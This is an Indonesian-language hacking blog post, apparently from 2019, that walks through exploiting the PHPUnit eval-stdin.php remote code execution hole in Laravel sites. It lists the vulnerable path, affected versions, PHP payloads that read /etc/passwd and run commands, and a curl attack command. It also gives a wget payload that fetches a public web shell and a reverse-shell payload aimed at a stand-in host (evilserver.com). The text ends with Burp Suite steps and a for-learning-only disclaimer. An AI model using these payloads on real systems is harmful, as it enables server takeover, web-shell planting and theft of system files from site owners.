Laravel PHPUnit Remote Code Execution

By Sabtu, 15 Juni 2019 Add Comment
Laravel PHPUnit Remote Code Execution - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Laravel PHPUnit Remote Code Execution, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Laravel PHPUnit Remote Code Execution. Sebenarnya ini bug sudah lama banget. Tapi jujur saja saya juga gak tau karena memang sudah jarang banget update masalah exploit. Nah karena exploit ini kembali rame, akhirnya saya coba share aja deh di blog barangkali ada yang belum tau. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya.



  • Vuln: eval-stdin.php

  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

  • Affected versions : Before 4.8.28 and 5.x before 5.6.3


Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa. Disini saya share yang pake curl dulu karena menurut saya ini yang paling simple.


Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan:


<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>

Contoh command


curl -d <?php echo php_uname(); ?> http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Tapi


Kalau ingin spawn shell ya tinggal diubah payloadnya menjadi wget misalnya


<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>

Atau diubah ke perintah untuk backconnect


<?php system('bash -i > /dev/tcp/evilserver.com/666 0>1');?>

Lalu di evil server dilisten ke port 666.


Tapi


Tapi


Atau, kalian bisa menggunakan Burpsuite.


Intercept, lalu kirim requestnya ke repeater.


Tapi


Lalu klik menu Repeater, masukkan payloadnya dibawah, dan klik tombol Go.


Tapi


Untuk responnya bisa dilihat di sebelah kolom request (sebelah kanan).


Tapi


Oke mungkin itu saja tutorial kali ini, sekian dan semoga bermanfaat.



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Laravel PHPUnit Remote Code Execution.
Terima kasih telah membaca artikel Laravel PHPUnit Remote Code Execution, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Laravel PHPUnit Remote Code Execution"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel